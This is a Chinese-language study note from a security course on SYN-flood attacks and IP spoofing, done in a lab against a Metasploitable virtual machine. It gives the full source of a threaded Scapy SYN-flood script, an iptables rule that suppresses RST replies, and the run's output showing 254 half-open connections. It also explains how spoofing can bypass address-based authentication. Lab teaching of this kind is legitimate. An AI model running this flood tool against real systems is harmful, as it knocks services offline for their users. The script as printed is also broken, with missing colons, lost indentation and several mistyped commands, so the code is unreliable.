【安全牛學習筆記】Syn-Flood、IP地址欺騙
Syn-Flood 長伴隨IP欺騙 - 真正的攻擊目標 Scapy - i=IP() - i.dst=1.1.1.1 - i.display() - t=TCP() - srl(i/t,verbose=1,timeout=3) - sr1(IP(dst=1.1.1.1)/TCP()) |
[email protected]:~$ ifconfig
[email protected]:~# scapy()
INFO: Can't import python gnuglot wrapper . won't be able to plot.
WARNING: NO route found for IPV6 destination :: (no default route?)
welcome to Scapy (2.3.2)
>>> exit()
[email protected]
[email protected]:~# scapy
WARNING: NO route found for IPV6 destination :: (no default route?)
welcome to Scapy (2.3.2)
>>> i=iP
>>> i.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= tcp
chksum= None
src= 127.0.0.1
dst= 127.0.0.1
\options\
>>> i.dst="192.168.1.110"
>>> i.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= tcp
chksum= None
src= 192.168.1.109
dst= 192.168.1.110
\options\
>>> t=TCP()
>>> t.display()
###[ TCP ]###
sport= ftp_data
dport= http
seq= 0
ack= 0
dataofs= None
reserved= 0
flags= S
window= 8192
chksum= None
urgptr= 0
options= {}
>>> t.dport=22
>>> t.display
###[ TCP ]###
sport= ftp_data
dport= ssh
seq= 0
ack= 0
dataofs= None
reserved= 0
flags= S
window= 8192
chksum= None
urgptr= 0
options= {}
>>>srl(i/t,verbose=1,timeout=2)
Begin emission:
Finished to send 1 packets.
Received 2 packets, got 1 answers, remaining 0 packets
<IP version= 4L ihl=5L tos= 0x0 len=44 id= 1 flags=DF frag=OL ttl= 64 proto= tcp chksum=0xb6a0 src= 192.168.1.110 dst= 192.168.1.109 options=[] |<TCP sport= ssh dport=ftp_data seq=3703105205 ack= 1 dataofs= 6L reserved=OL flags=SA window=5840 chksum=0x397d urgptr= 0 options= {('MSS',1460)} |<Padding load='\x00\x00' |>>>
wireshark
ip.addr eq 192.168.1.110
Syn-Flood 攻擊指令碼:./syn_flood.py - iptables -A OUTPUT -p tcp --tcp-flags RST -d 1.1.1.1 -j DROP - netstat -n | awk '/^tcp/{++S[$NF]} END {for(a in S) print a,S[a]}' - windows系統預設半開連線數10個 |
LISTEN | S伺服器埠處於偵聽狀態,等待連線請求 |
SYN-SENT | C發起連線請求,等待對端響應 |
SYN-RECV | S已收到連線請求 |
ESTABLISHED | C/S三次握手成功,TCP連線已經建立 |
FIN-WAIT-1 | C/S等待對端響應中斷請求確認,或對端終端請求 |
FIN-WAIT-2 | C/S等待對端傳送中斷請求 |
CLOSE-WAIT | C/S等待本地 程序/使用者 關閉連線 |
CLOSING | C/S等待對端響應連線中斷確認 |
LAST-ACK | C/S等待對端響應之前的連線中斷確認 |
TIME-WAIT | C/S等待足夠時間長度確保對端收到連線中斷確認(最大4分鐘) |
CLOSED | C/S無任何連線狀態 |
[email protected]:~# iptables -A OUTPUT -p tcp --tcp-flags RST -d 192.168.1.110 -j DROP
[email protected]:~# iptable -L
Chain INPUT (policy ACCEPT)
target port opt source destination
Chain FPRWARD (policy ACCEPT)
target port opt source destination
Chain OUTPUT (policy ACCEPT)
target port opt source destination
DROP tcp -- anywhere 192.168.1.110 tcp flags:RST/RST
[email protected]:~# cp /media/sf_D_DRIVE/指令碼/syn_flood.py . //拷貝到當前目錄
[email protected]:~# ls
Desptop Downloads Pictures sys_flood.py Videos
Documents Music public Templates
[email protected]:~# geany syn_flood.py
------------------------------------------------------------
#!/usr/bin/python
# .*. coding: utf-8 -*
from scapy.all import *
from time import sleep
import thread
import random
import logging
logging.getLogger("scapy.runtime").setLevel(Logging.ERROR)
if len(sys.argv) != 4:
print "用法: ./syn_flood.py [IP地址] [埠] [執行緒數]"
print "舉例: ./syn_flood.py 1.1.1.1 80 20"
sys.exit()
target = str(sys.argv[1])
port = int(sys.argv[2])
threads = int(sys.argv[3])
print "正在執行 SYN flood 攻擊,按 Ctrl+C 停止攻擊."
def synflood(target,port):
while 0 == 0
x = random.randint(0,65535)
send(IP(dst=target)/TCP(dport=port,sport=x),verbose=0)
for x in range(0,threads):
thread.start_new_thread(synflood, (target,port))
while 0 == 0
sleep(1)
------------------------------------------------------------
[email protected]:~# ./syn_flood.py
WARNING: No route found for IPV6 destination :: (no default route?)
用法: ./syn_flood.py [IP地址] [埠] [執行緒數]
舉例: ./syn_flood.py 1.1.1.1 80 20
[email protected]:~# ./syn_flood.py 192.168.1.110 22 200
[email protected]:~# ssh [email protected]
The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.
RSA key fingerprint is SHA256:BQHM5EoHx9GCi0LuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.110' (RSA) to the list of known hosts.
[email protected]'s password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individal files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY , to the exten permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail,
last login: Thu Jun 16 07:25:55 2016
[email protected]:~$ exit
logout
Conection to 192.168.1.110 closed.
[email protected]:~# ssh [email protected]
[email protected]:~$ sudo netstat -n
[email protected]:~$ sudo netstat -n | awk '/^tcp/{++S[$NF]} END {for(a in S) print a,S[a]}'
SYN_RECV 254
C:\> net user yuanfh 123
[email protected]:~# openvas-stop
Stopping Openvas Services
[email protected]:~# rdestop 192.168.1.111
[email protected]:~# netstat -pantu | more
IP地址欺騙 經常用於Dos攻擊 根據IP頭地址定址 - 偽造IP源地址 邊界路由器過濾 - 入站、出站 受害者可能是源、目的地址 繞過基於地址的驗證 壓力測試模擬多使用者 上層協議(TCP序列號) |
相關推薦
【安全牛學習筆記】Syn-Flood、IP地址欺騙
Syn-Flood 長伴隨IP欺騙 - 真正的攻擊目標 Scapy
【安全牛學習筆記】補充Proxytunnel、stunnel4
security+ 信息安全 stunnel4 無需修改源代碼的情況下降TCP流量封裝與SSL通道內適用於本身不支持加密傳輸的應用 支持openssl安全特性
【安全牛學習筆記】XSS-簡介、跨站腳本檢測和常見的攻擊利用手段
信息安全 security+ xss XSS攻擊WEB客戶端客戶端腳本語言 彈窗警告、廣告 Javascript 在瀏覽器中執行XSS(cross-site scripting) 通過WEB站點漏洞,向客戶端交付惡意腳本代碼,實現對客戶端的攻擊目的 註入客戶端腳本代碼
【安全牛學習筆記】XSS-簡介、跨站腳本檢測和常見的攻擊利用手段2
信息安全 security+ xss ╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃XSS ┃┃攻擊WEB客戶端
【安全牛學習筆記】XSS的簡述
cookie 服務器 漏洞 安全 xss 1.Cross Site SCripting 攻擊者往Web頁面裏插入惡意Script代碼,當用戶瀏覽該頁時,嵌入其中Web裏面的Script代碼會被執行,從而達到惡意攻擊用戶的目的。
【安全牛學習筆記】XSS的利用
xss 惡意代碼 漏洞 反射型XSS1.概念 通過社會工程學等手段誘騙用戶點擊某個精心構造的鏈接,該鏈接會將惡意的js代碼提交給 有漏洞的服務器網站,並由服務器返回給受害者的客戶端執行。 2.POC -<scri
【安全牛學習筆記】Web掃描器(1)
安全 web 漏洞 1.偵察httrack可將目標網站的網頁全部爬取下來,減少偵察過程中與目標服務器發生的交互。 2.Nikto(1).檢測對象 掃描軟件版本 搜索存在安全隱患的文件 配置漏洞
【安全牛學習筆記】OSI網絡模型
http ssh stmp 安全 OSI網絡模型 物理層規定比特在物理介質中的傳輸方式,解決物理傳輸過程中的問題。 代表設備:中繼器,集線器(多端口中繼器) 數據鏈路層 在不可靠的網絡環境中進行可靠的數據傳輸。解決數據傳輸中可能出現的
【安全牛學習筆記】搜索引擎
安全、web、滲透、信息安全 搜索引擎 shodan爬取banner信息。搜索聯網設備。 常用關鍵字: netcity country CNport oshostname實例:cisco 200 ok 思科設備default password 默認密碼
【安全牛學習筆記】服務掃描
安全、web、滲透、信息安全 1.簡述 識別開放端口上的應用 識別目標操作系統 提高攻擊效率 2.分類 Banner信息獲取 服務識別 操作系統識別snmp分析 防火墻識別 3.Banner (1).含義
【安全牛學習筆記】Kali Linux 安裝-持久加密USB安裝、熟悉環境、熟悉BASH命令
security+ linux 信息安全 持久加密USB安裝-1LUKS: linux UNified Key Setup 磁盤分區加密規範 不依賴於操作系統的磁盤級加密 Windows——DoxBox 後端:dm-crypt 前端:cryptsetup 微軟的bitlocker將鏡像
【安全牛學習筆記】網絡配置、更新升級、安裝軟件包、瀏覽器插件
信息安全;網絡配置[email protected]:~# dhclient eth0 //用來通過 dhcp 協議配置本機的網絡接口[email protected]:~# ifconfig 查看現在的ip地址[email protected]:~# ifc
【安全牛學習筆記】 Kali Linux安裝-熟悉環境
信息安全;security+;kali linux熟悉BASH命令 Ls、cd、pwd、cat、more、tail、cp、rm、top、ps、greg、ifconfig、netstat、awk、sort、route、mount、dmesg、find、whereis、Echo、vi 管道 shell腳本[
【安全牛學習筆記】基本工具-NETCAT(telnet/banner、傳輸文本信息)
信息安全;security+;kali linux滲透測試常用工具經常使用且功能強大安全從業者必不可少的幫手Nc / ncatWireshackTcpdumpNETCAT-----NC網絡工具中的瑞士軍刀——小身材、大智慧偵聽模式/傳輸模式telnet/獲取banner信息傳輸文本信息傳輸文件目錄加密傳輸文件
【安全牛學習筆記】實驗環境
信息安全;security+;kali linux滲透測試準備實驗環境 滲透非授權系統的弊端 搭建自己的實驗環境安裝虛擬機微軟最新版軟件 http://msdn .microsoft.com/en-ca/subscriptions/aa336858windows虛擬機 http://dev.mod
【安全牛學習筆記】TOR
信息安全;security+;kali linux滲透測試保護隱私防止被追蹤誌願者組成長期在天朝完全無法使用 感謝 雲暗網 互聯網搜索引擎無法發現 互聯網黑市下載和看視頻是不道德的行為互聯網黑市交易的貨幣是比特幣比特幣很難在互聯網復原下載http://www.torproject.org/d
【安全牛學習筆記】搜索引擎、SHODAN
信息安全 security+ 搜索引擎、SHODAN╋━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃搜索引擎 ┃┃公司新聞動態 ┃┃重要雇員信息
【安全牛學習筆記】
信息安全;security+; 弱點掃描╋━━━━━━━━━━━━━━━━━━━━╋┃發現弱點 ┃┃發現漏洞 ┃┃ 基於端口五福掃描結果版本信息(速度慢)┃┃ 搜索已公開的漏洞數據庫
【安全牛學習筆記】 NESSUS
信息安全;security+; NESSUS╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃NESSUS ┃┃家庭版
【安全牛學習筆記】NEXPOSE
信息安全;security+;NEXPOSE Rapid 7